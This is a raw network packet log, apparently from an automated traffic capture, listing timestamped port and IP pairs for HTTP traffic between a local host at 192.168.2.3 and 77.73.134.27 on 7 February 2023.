                                                                                    Feb 7, 2023 19:44:56.035360098 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035381079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035392046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035410881 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035422087 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035442114 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035451889 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035474062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035480976 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035501957 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035511971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035532951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035542011 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035573006 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035577059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035588980 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035602093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035626888 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035631895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035661936 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035665989 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035684109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035698891 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035722017 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035727978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035753012 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035758972 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035780907 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035792112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035813093 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035823107 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035844088 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035852909 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035873890 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035883904 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035904884 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035914898 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035938978 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035947084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035969019 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.036010981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.036030054 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.036041975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.036060095 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.036073923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.036089897 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.036104918 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.036123037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.036153078 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040431976 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040466070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040491104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040514946 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040540934 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040543079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040570021 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040575027 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040596962 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040621996 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040651083 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040668011 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040682077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040707111 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040710926 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040734053 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040740967 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040760994 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040770054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040795088 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040802002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040819883 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040833950 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040853977 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040864944 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040883064 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040895939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040915966 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040926933 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040946007 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040958881 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.040977955 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.040988922 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041011095 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041021109 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041043043 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041050911 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041070938 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041081905 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041102886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041114092 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041136980 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041145086 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041165113 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041176081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041208029 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041234016 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041238070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041246891 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041258097 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041269064 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041300058 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041306019 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041317940 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041331053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041358948 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041368008 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041387081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041393995 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041414976 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041423082 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041444063 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041445971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041466951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041476011 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041502953 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041507006 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041520119 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041538000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041555882 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041568995 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041585922 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041599989 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041623116 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041630983 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041647911 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041666031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041678905 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041697025 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041714907 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041728973 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041752100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041759968 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041780949 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041790009 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041807890 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041821003 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041840076 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041851044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041871071 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041881084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041908026 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041912079 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041925907 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041941881 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041964054 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.041971922 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.041992903 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.042001009 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.042022943 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.042049885 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.058463097 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.058672905 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.059494972 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.059535027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.059555054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.059581041 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.059623957 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.059642076 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.059683084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.059693098 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.059731960 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.059751987 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.059760094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.059787989 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.059818983 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.059844017 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.059854031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.059881926 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.059919119 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.059937000 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.059943914 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.059973955 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060000896 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060003042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060024977 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060033083 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060064077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060065031 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060091972 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060122013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060137033 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060137033 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060151100 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060161114 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060178041 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060183048 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060209036 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060214043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060245991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060247898 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060267925 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060276031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060306072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060328007 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060348034 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060378075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060405970 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060406923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060431004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060439110 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060466051 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060470104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060501099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060501099 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060522079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060532093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060556889 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060563087 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060592890 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060592890 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060620070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060647964 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060650110 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060678959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060691118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060709000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060728073 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060736895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060766935 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060795069 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060798883 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060823917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060836077 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060853958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060869932 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060883045 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060889959 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060911894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060924053 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060944080 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.060947895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060964108 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.060976982 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061000109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061008930 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061036110 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061042070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061059952 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061075926 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061101913 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061105967 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061130047 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061140060 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061167002 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061171055 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061198950 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061204910 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061234951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061239958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061270952 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061273098 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061294079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061300993 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061327934 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061333895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061351061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061367035 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061393023 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061397076 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061427116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061428070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061445951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061456919 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061481953 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061487913 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061511040 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061521053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061544895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061553001 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061578989 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061585903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061605930 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061616898 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061641932 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061647892 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061670065 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061681032 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061707973 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061712980 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061729908 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061744928 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061769009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061777115 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061796904 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061809063 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061834097 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061841965 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061863899 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061873913 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061898947 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061907053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061928034 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061938047 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061965942 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061968088 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.061988115 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.061996937 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062021017 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062032938 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062052011 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062064886 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062088013 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062097073 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062124014 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062128067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062146902 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062160015 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062182903 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062191010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062221050 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062222958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062244892 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062256098 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062283039 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062305927 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062330961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062362909 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062391996 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062395096 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062418938 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062422037 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062441111 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062453985 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062479973 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062484026 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062510967 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062517881 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062547922 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062551022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062566996 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062582016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.062604904 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.062613964 CET804969877.73.134.27192.168.2.3
